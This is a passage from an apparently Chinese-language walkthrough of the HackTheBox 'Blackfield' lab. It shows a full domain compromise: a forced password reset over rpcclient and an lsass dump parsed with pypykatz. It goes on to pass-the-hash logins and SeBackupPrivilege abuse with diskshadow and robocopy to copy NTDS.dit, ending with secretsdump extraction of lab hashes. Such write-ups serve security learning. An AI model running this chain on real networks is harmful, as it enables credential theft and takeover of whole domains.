SMB         10.129.229.17   445    DC01             BLACKFIELD307633              2020-02-23 12:49:20 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD758945              2020-02-23 12:49:21 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD541148              2020-02-23 12:49:22 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD532412              2020-02-23 12:49:23 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD996878              2020-02-23 12:49:24 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD653097              2020-02-23 12:49:25 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD438814              2020-02-23 12:49:26 0        
SMB         10.129.229.17   445    DC01             svc_backup                    2020-02-23 17:54:48 0        
SMB         10.129.229.17   445    DC01             lydericlefebvre               2020-02-28 22:33:35 0       @lydericlefebvre - VM Creator 
SMB         10.129.229.17   445    DC01             [*] Enumerated 315 local users: BLACKFIELD

使用rusthound做域权限收集

1
./rusthound -d BLACKFIELD.local -u support -p '#00^BlackKnight' -i 10.129.229.17 -z

我们对audit2020有密码强制修改权限

用rpcclient修改密码

1
2
3
4
5
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# rpcclient -U "BLACKFIELD.local\support%#00^BlackKnight" 10.129.229.17        
rpcclient $> 
rpcclient $> setuserinfo2 audit2020 23 'KaaDa@2026!'
rpcclient $>

验证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u 'audit2020' -p 'KaaDa@2026!' --shares
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\audit2020:KaaDa@2026! 
SMB         10.129.229.17   445    DC01             [*] Enumerated shares
SMB         10.129.229.17   445    DC01             Share           Permissions     Remark
SMB         10.129.229.17   445    DC01             -----           -----------     ------
SMB         10.129.229.17   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.229.17   445    DC01             C$                              Default share
SMB         10.129.229.17   445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.129.229.17   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.229.17   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.229.17   445    DC01             profiles$       READ            
SMB         10.129.229.17   445    DC01             SYSVOL          READ            Logon server share

forensic现在可读

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -U audit2020 //10.129.229.17/forensic 
Password for [WORKGROUP\audit2020]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Feb 23 13:03:16 2020
  ..                                  D        0  Sun Feb 23 13:03:16 2020
  commands_output                     D        0  Sun Feb 23 18:14:37 2020
  memory_analysis                     D        0  Thu May 28 20:28:33 2020
  tools                               D        0  Sun Feb 23 13:39:08 2020

		5102079 blocks of size 4096. 1691631 blocks available
smb: \> 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
smb: \> cd memory_analysis\
smb: \memory_analysis\> dir
  .                                   D        0  Thu May 28 20:28:33 2020
  ..                                  D        0  Thu May 28 20:28:33 2020
  conhost.zip                         A 37876530  Thu May 28 20:25:36 2020
  ctfmon.zip                          A 24962333  Thu May 28 20:25:45 2020
  dfsrs.zip                           A 23993305  Thu May 28 20:25:54 2020
  dllhost.zip                         A 18366396  Thu May 28 20:26:04 2020
  ismserv.zip                         A  8810157  Thu May 28 20:26:13 2020
  lsass.zip                           A 41936098  Thu May 28 20:25:08 2020
  mmc.zip                             A 64288607  Thu May 28 20:25:25 2020
  RuntimeBroker.zip                   A 13332174  Thu May 28 20:26:24 2020
  ServerManager.zip                   A 131983313  Thu May 28 20:26:49 2020
  sihost.zip                          A 33141744  Thu May 28 20:27:00 2020
  smartscreen.zip                     A 33756344  Thu May 28 20:27:11 2020
  svchost.zip                         A 14408833  Thu May 28 20:27:19 2020
  taskhostw.zip                       A 34631412  Thu May 28 20:27:30 2020
  winlogon.zip                        A 14255089  Thu May 28 20:27:38 2020
  wlms.zip                            A  4067425  Thu May 28 20:27:44 2020
  WmiPrvSE.zip                        A 18303252  Thu May 28 20:27:53 2020

		5102079 blocks of size 4096. 1691631 blocks available
smb: \memory_analysis\> get lsass.zip 
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\>

获取lasss.zip

1
2
3
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u 'audit2020' -p 'KaaDa@2026!' --get-file '\memory_analysis\lsass.zip' lsass.zip

本地解析

1
2
unzip lsass.zip
pypykatz lsa minidump lsass.DMP

获取到的域管哈希是假的没办法登

但获取到的svc_backup哈希是真的。

1
2
3
4
5
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d      
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d

1
2
3
4
5
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
WINRM       10.129.229.17   5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM       10.129.229.17   5985   DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)

并且有远程登录权限,evil-winrm上去

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i 10.129.229.17 -u 'svc_backup' -H 9658d1d1dcd9250115e2205d9f48400d
                                        
Evil-WinRM shell v3.9 
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline 
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion 
                                        
Info: Establishing connection to remote endpoint 
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ..\desktop\user.txt
3920bb317a0bef51027e2852be64b543
*Evil-WinRM* PS C:\Users\svc_backup\Documents> 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_backup\Documents>

有backup和SeRestorePrivilege权限

那直接备份NTDS.dit和SYSTEM文件即可

SeBackupPrivilege 创建并访问卷影副本,拷贝 NTDS.dit + SYSTEM,离线解析得到管理员哈希。

导出 SYSTEM 注册表配置单元

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
*Evil-WinRM* PS C:\Users\svc_backup\Documents> robocopy /b C:\Windows\NTDS C:\Users\svc_backup\Documents\temp ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Monday, June 22, 2026 3:51:32 AM
   Source : C:\Windows\NTDS\
     Dest : C:\Users\svc_backup\Documents\temp\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

	                   1	C:\Windows\NTDS\
	    New File  		  18.0 m	ntds.dit
2026/06/22 03:51:32 ERROR 32 (0x00000020) Copying File C:\Windows\NTDS\ntds.dit
The process cannot access the file because it is being used by another process.

用diskshadow

1
2
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# printf 'set context persistent nowriters\r\nadd volume c: alias cdrive\r\ncreate\r\nexpose %%cdrive%% z:\r\n' > dshadow.txt   
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
*Evil-WinRM* PS C:\> cd temp
*Evil-WinRM* PS C:\temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
*Evil-WinRM* PS C:\temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append    
*Evil-WinRM* PS C:\temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> diskshadow.exe /s c:\temp\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/22/2026 3:53:53 AM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {d9297eac-45d1-4ff5-9f89-55b241392c02} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {1c928807-c8cf-4d93-a029-ad88f5f6fb64} set as environment variable.

Querying all shadow copies with the shadow copy set ID {1c928807-c8cf-4d93-a029-ad88f5f6fb64}

	* Shadow copy ID = {d9297eac-45d1-4ff5-9f89-55b241392c02}		%temp%
		- Shadow copy set: {1c928807-c8cf-4d93-a029-ad88f5f6fb64}	%VSS_SHADOW_SET%
		- Original count of shadow copies = 1
		- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
		- Creation time: 6/22/2026 3:53:54 AM
		- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
		- Originating machine: DC01.BLACKFIELD.local
		- Service machine: DC01.BLACKFIELD.local
		- Not exposed
		- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
		- Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {d9297eac-45d1-4ff5-9f89-55b241392c02}
The shadow copy was successfully exposed as z:\.
->

验证挂载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
*Evil-WinRM* PS C:\temp> ls z:\


    Directory: z:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/26/2020   5:38 PM                PerfLogs
d-----         6/3/2020   9:47 AM                profiles
d-r---        3/19/2020  11:08 AM                Program Files
d-----         2/1/2020  11:05 AM                Program Files (x86)
d-----        6/22/2026   3:53 AM                temp
d-r---        2/23/2020   9:16 AM                Users
d-----        9/21/2020   4:29 PM                Windows
-a----        2/28/2020   4:36 PM            447 notes.txt


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324

*Evil-WinRM* PS C:\temp> robocopy /b Z:\Windows\NTDS C:\temp NTDS.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Monday, June 22, 2026 3:54:52 AM
   Source : Z:\Windows\NTDS\
     Dest : C:\temp\

    Files : NTDS.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

	                   1	Z:\Windows\NTDS\
	    New File  		  18.0 m	ntds.dit
  0.0%
  0.3%
  0.6%
  1.0%
  1.3%
  1.7%
  2.0%
  2.4%
  2.7%
  3.1%
  3.4%
  3.8%
  4.1%
  4.5%
  4.8%
  5.2%
  5.5%
  5.9%
  6.2%
  6.5%
  6.9%
  7.2%
  7.6%
  7.9%
  8.3%
  8.6%
  9.0%
  9.3%
  9.7%
 10.0%
 10.4%
 10.7%
 11.1%
 11.4%
 11.8%
 12.1%
 12.5%
 12.8%
 13.1%
 13.5%
 13.8%
 14.2%
 14.5%
 14.9%
 15.2%
 15.6%
 15.9%
 16.3%
 16.6%
 17.0%
 17.3%
 17.7%
 18.0%
 18.4%
 18.7%
 19.0%
 19.4%
 19.7%
 20.1%
 20.4%
 20.8%
 21.1%
 21.5%
 21.8%
 22.2%
 22.5%
 22.9%
 23.2%
 23.6%
 23.9%
 24.3%
 24.6%
 25.0%
 25.3%
 25.6%
 26.0%
 26.3%
 26.7%
 27.0%
 27.4%
 27.7%
 28.1%
 28.4%
 28.8%
 29.1%
 29.5%
 29.8%
 30.2%
 30.5%
 30.9%
 31.2%
 31.5%
 31.9%
 32.2%
 32.6%
 32.9%
 33.3%
 33.6%
 34.0%
 34.3%
 34.7%
 35.0%
 35.4%
 35.7%
 36.1%
 36.4%
 36.8%
 37.1%
 37.5%
 37.8%
 38.1%
 38.5%
 38.8%
 39.2%
 39.5%
 39.9%
 40.2%
 40.6%
 40.9%
 41.3%
 41.6%
 42.0%
 42.3%
 42.7%
 43.0%
 43.4%
 43.7%
 44.0%
 44.4%
 44.7%
 45.1%
 45.4%
 45.8%
 46.1%
 46.5%
 46.8%
 47.2%
 47.5%
 47.9%
 48.2%
 48.6%
 48.9%
 49.3%
 49.6%
 50.0%
 50.3%
 50.6%
 51.0%
 51.3%
 51.7%
 52.0%
 52.4%
 52.7%
 53.1%
 53.4%
 53.8%
 54.1%
 54.5%
 54.8%
 55.2%
 55.5%
 55.9%
 56.2%
 56.5%
 56.9%
 57.2%
 57.6%
 57.9%
 58.3%
 58.6%
 59.0%
 59.3%
 59.7%
 60.0%
 60.4%
 60.7%
 61.1%
 61.4%
 61.8%
 62.1%
 62.5%
 62.8%
 63.1%
 63.5%
 63.8%
 64.2%
 64.5%
 64.9%
 65.2%
 65.6%
 65.9%
 66.3%
 66.6%
 67.0%
 67.3%
 67.7%
 68.0%
 68.4%
 68.7%
 69.0%
 69.4%
 69.7%
 70.1%
 70.4%
 70.8%
 71.1%
 71.5%
 71.8%
 72.2%
 72.5%
 72.9%
 73.2%
 73.6%
 73.9%
 74.3%
 74.6%
 75.0%
 75.3%
 75.6%
 76.0%
 76.3%
 76.7%
 77.0%
 77.4%
 77.7%
 78.1%
 78.4%
 78.8%
 79.1%
 79.5%
 79.8%
 80.2%
 80.5%
 80.9%
 81.2%
 81.5%
 81.9%
 82.2%
 82.6%
 82.9%
 83.3%
 83.6%
 84.0%
 84.3%
 84.7%
 85.0%
 85.4%
 85.7%
 86.1%
 86.4%
 86.8%
 87.1%
 87.5%
 87.8%
 88.1%
 88.5%
 88.8%
 89.2%
 89.5%
 89.9%
 90.2%
 90.6%
 90.9%
 91.3%
 91.6%
 92.0%
 92.3%
 92.7%
 93.0%
 93.4%
 93.7%
 94.0%
 94.4%
 94.7%
 95.1%
 95.4%
 95.8%
 96.1%
 96.5%
 96.8%
 97.2%
 97.5%
 97.9%
 98.2%
 98.6%
 98.9%
 99.3%
 99.6%
100%
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   18.00 m   18.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00


   Speed :           152212645 Bytes/sec.
   Speed :            8709.677 MegaBytes/min.
   Ended : Monday, June 22, 2026 3:54:52 AM


1
2
3
4
*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Windows\Tasks\SYSTEM
The operation completed successfully.


1
2
3
4
5
6
*Evil-WinRM* PS C:\temp> download ntds.dit
                                        
Info: Downloading C:\temp\ntds.dit to ntds.dit 
                                        
Info: Download successful!

还有一些小的坑点比如evil-winrm会拼凑无效路径

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\temp> move C:\Windows\Tasks\SYSTEM C:\temp\SYSTEM
*Evil-WinRM* PS C:\temp> dir


*Evil-WinRM* PS C:\temp> download SYSTEM
                                        
Info: Downloading C:\temp\SYSTEM to SYSTEM 
                                        
Info: Download successful! 
*Evil-WinRM* PS C:\temp>

本地解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i 10.129.229.17 -u 'administrator' -H 184fb5e5178480be64824d4cd53b99ee
                                        
Evil-WinRM shell v3.9 
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline 
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion 
                                        
Info: Establishing connection to remote endpoint 
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\desktop\root.txt
4375a629c7c67c8e29db269060c955cb
*Evil-WinRM* PS C:\Users\Administrator\Documents>

#HTB
HackTheBox-Blackfield
http://example.com/2026/06/22/HackTheBox-Blackfield/
Author
Skyarrow
Posted on
June 22, 2026
Licensed under